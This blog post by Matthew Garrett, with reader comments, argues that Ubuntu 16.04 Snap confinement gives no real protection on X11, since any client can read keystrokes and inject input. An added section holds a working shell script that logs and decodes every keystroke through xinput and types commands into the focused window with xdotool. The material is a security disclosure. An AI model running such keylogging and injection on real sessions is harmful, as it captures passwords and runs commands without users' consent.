mjg59
Ubuntu 16.04 was released today, with one of the highlights being the new Snap package format. Snaps are intended to make it easier to distribute applications for Ubuntu - they include their dependencies rather than relying on the archive, they can be updated on a schedule that's separate from the distribution itself and they're confined by a strong security policy that makes it impossible for an app to steal your data.

At least, that's what Canonical assert. It's true in a sense - if you're using Snap packages on Mir (ie, Ubuntu mobile) then there's a genuine improvement in security. But if you're using X11 (ie, Ubuntu desktop) it's horribly, awfully misleading. Any Snap package you install is completely capable of copying all your private data to wherever it wants with very little difficulty.

The problem here is the X11 windowing system. X has no real concept of different levels of application trust: every client that can reach the X socket is equal, and the server never asks which client owns a window before answering a request. Any application can register to receive keystrokes from any other application (the XRecord extension and XInput2 raw events both hand out every key event the server sees, regardless of focus). Any application can inject fake key events into the input stream (via the XTEST extension, which is what tools like xdotool use). An application that is otherwise confined by strong security policies can simply type into another window. An application that has no access to any of your private data can wait until your session is idle, open an unconfined terminal and then use curl to send your data to a remote site. Snap's AppArmor and seccomp confinement does nothing about this, because a snap that is allowed to draw a window at all has been handed the X socket, and with it every privilege an ordinary X client has. As long as Ubuntu desktop still uses X11, the Snap format provides you with very little meaningful security. Mir and Wayland both fix this, since the compositor only delivers input to the focused client and there is no equivalent of XRecord or XTEST for other clients to call, which is why Wayland is a prerequisite for the sandboxed xdg-app design.

I've produced a quick proof of concept of this. Grab XEvilTeddy from git, install Snapcraft (it's in 16.04), run `snapcraft snap`, then `sudo snap install xevilteddy*.snap` and `/snap/bin/xevilteddy.xteddy`. An adorable teddy bear! How cute. Now open Firefox and start typing, then check back in your terminal window. Oh no! All my secrets. Open another terminal window and give it focus. Oh no! An injected command that could instead have been a curl session that uploaded your private SSH keys to somewhere that's not going to respect your privacy.
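As an added example that is not part of the original post or of XEvilTeddy, here are the same two primitives driven from the shell with the stock `xinput` and `xdotool` tools: `xinput test` asks the server for every event a keyboard device generates, and `xdotool type` synthesises key presses through XTEST. It assumes an X11 session in `$DISPLAY` with xinput, xdotool and xmodmap installed. The keystroke decoder is pure text processing over captured `xinput test` output, so that part runs without a display.

```shell
#!/bin/sh
# Added example, not from the post or XEvilTeddy. Demonstrates the two X11
# primitives the post relies on using stock tools: xinput (reads any
# device's events) and xdotool (injects input via XTEST). Assumes an X11
# session in $DISPLAY and that xinput, xdotool and xmodmap are installed.

# Primitive 1: ask X for every event from every keyboard device. The server
# never checks whether the caller owns the focused window, so a client with
# no file access still sees what is typed into Firefox or a terminal.
# Output is xinput's own format, e.g. "key press   38 ".
snoop_keyboards() {
    secs=${1:-15}
    for id in $(xinput list | sed -n 's/.*id=\([0-9][0-9]*\).*slave *keyboard.*/\1/p'); do
        timeout "$secs" xinput test "$id" &
    done
    wait
}

# Turn "key press <keycode>" lines (stdin) into text using an "xmodmap -pke"
# keymap ($1: lines like "keycode  38 = a A a A"). Tracks Shift only; other
# modifiers are ignored. Unmapped keycodes are emitted as "<keycode>".
decode_keylog() {
    awk -v keymap="$1" '
        BEGIN {
            while ((getline line < keymap) > 0)
                if (split(line, f, "[ =]+") >= 4 && f[1] == "keycode") {
                    lower[f[2]] = f[3]
                    upper[f[2]] = (f[4] != "" && f[4] != "NoSymbol") ? f[4] : f[3]
                }
        }
        $1 == "key" {
            code = $3
            name = (code in lower) ? lower[code] : "<" code ">"
            if (name == "Shift_L" || name == "Shift_R") { shifted = ($2 == "press"); next }
            if ($2 != "press") next
            if (shifted && (code in upper)) name = upper[code]
            if (name == "space") name = " "
            else if (name == "Return") name = "\n"
            printf "%s", name
        }'
}

# Primitive 2: synthesise keystrokes into whatever window has focus. A snap
# that may not read ~/.ssh can wait for a terminal to have focus and type a
# command that reads it on its behalf; the post's curl upload is one line.
inject_into_focused_window() {
    xdotool type --delay 40 -- "$1"
    xdotool key Return
}

# Demo mirroring the XEvilTeddy steps: log what is typed anywhere for 15 s,
# then inject a (harmless) command into the focused window.
if [ "${1:-}" = "demo" ] && [ -n "${DISPLAY:-}" ]; then
    km=$(mktemp)
    xmodmap -pke > "$km"
    echo 'Type into any other window for 15 seconds...' >&2
    snoop_keyboards 15 | decode_keylog "$km"
    echo
    inject_into_focused_window 'echo injected by an ordinary X client'
    rm -f "$km"
fi
```

Save it under any name and run it with the argument `demo` from a terminal, type into another window for fifteen seconds, and the decoded text appears before a command is typed into whichever window has focus. Nothing in it needs root or escapes any sandbox: each step is an ordinary X request that the server answers identically for every connected client, which is the whole point of the post.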

The Snap format provides a lot of underlying technology that is a great step towards being able to protect systems against untrustworthy third-party applications, and once Ubuntu shifts to using Mir by default it'll be much better than the status quo. But right now the protections it provides are easily circumvented, and it's disingenuous to claim that it currently gives desktop users any real security.

Date: 2016-04-22 03:58 am (UTC)
From: (Anonymous)
Are there not checks on this sort of thing when uploading to the app store?

XSM

Date: 2016-04-22 04:42 am (UTC)
From: (Anonymous)
It's worth noting that X has supported pluggable security modules for some time now. IIRC, though, the only useful implementation is for SELinux, and is BYO policy.

Date: 2016-04-22 08:31 am (UTC)
From: (Anonymous)
This is the kind of problem that all Linux X11 distros have had over the years and that we have all lived with?

Date: 2016-04-22 08:48 am (UTC)
From: (Anonymous)
Only one Ubuntu OS is using X11 right now and that will change with the next release.

Date: 2016-04-22 10:30 am (UTC)
From: (Anonymous)
Built the snap successfully with your instructions but can't get it to run. Running /snap/bin/xevilteddy.xteddy says:
xteddy: Cannot connect to X server :0

Any clues? Running fresh updated install of 16.04 on virtualbox.

The Horror!

Date: 2016-04-22 11:18 am (UTC)
From: (Anonymous)
Oh no! An application running in a snap can do the *exact same thing* any other application running on the system can do! The world is ending! The world is ending!

Y'know, unless snapd runs the equivalent of `xauth generate $DISPLAY . untrusted` before it runs the application itself.

bad system call

Date: 2016-04-22 01:54 pm (UTC)
From: (Anonymous)
When I ran this command:

/snap/bin/xevilteddy.xteddy

I didn't see any teddy bear; instead it displayed an error message.

bad system call

I didn't see any keystroke information in the terminal after typing in firefox.

Date: 2016-04-22 07:52 pm (UTC)
From: (Anonymous)
I hadn't heard about snap until now. It seems to overlap with the goals of xdg-app. What are the differences? What do they have in common?

There once was a B2 X, if memory serves...

Date: 2016-04-23 11:27 am (UTC)
From: (Anonymous)
I used to run Trusted Solaris 7, to separate possibly-unfriendly customers, and it would happily put up windows with the category and security level shown, and refuse to copy between them if the recipient's credentials didn't dominate the sender's.

The category stuff would work well with SELinux, and I'd use it today if I could. The levels (Secret, Top Secret, etc) less so.

--dave collier-brown
davecb@spamcop.net

Date: 2016-04-24 07:57 am (UTC)
From: (Anonymous)
Seems like a solution would be to not let apps talk to X directly, but have them go through some type of mediator, that prevents them from doing malicious things. But maybe it's not possible to tell what's malicious and what's not...

Extra security risk?

Date: 2016-05-07 04:41 pm (UTC)
From: (Anonymous)
I am a little confused, so snaps do not introduce any new security flaws into the Ubuntu system, they just don't offer any more protection than the standard .deb? So it is safe to download Ubuntu 16.04?

Matthew Garrett

About Matthew

Power management, mobile and firmware developer on Linux. Security developer at Google. Member of the Free Software Foundation board of directors. Ex-biologist. @mjg59 on Twitter. Content here should not be interpreted as the opinion of my employer.
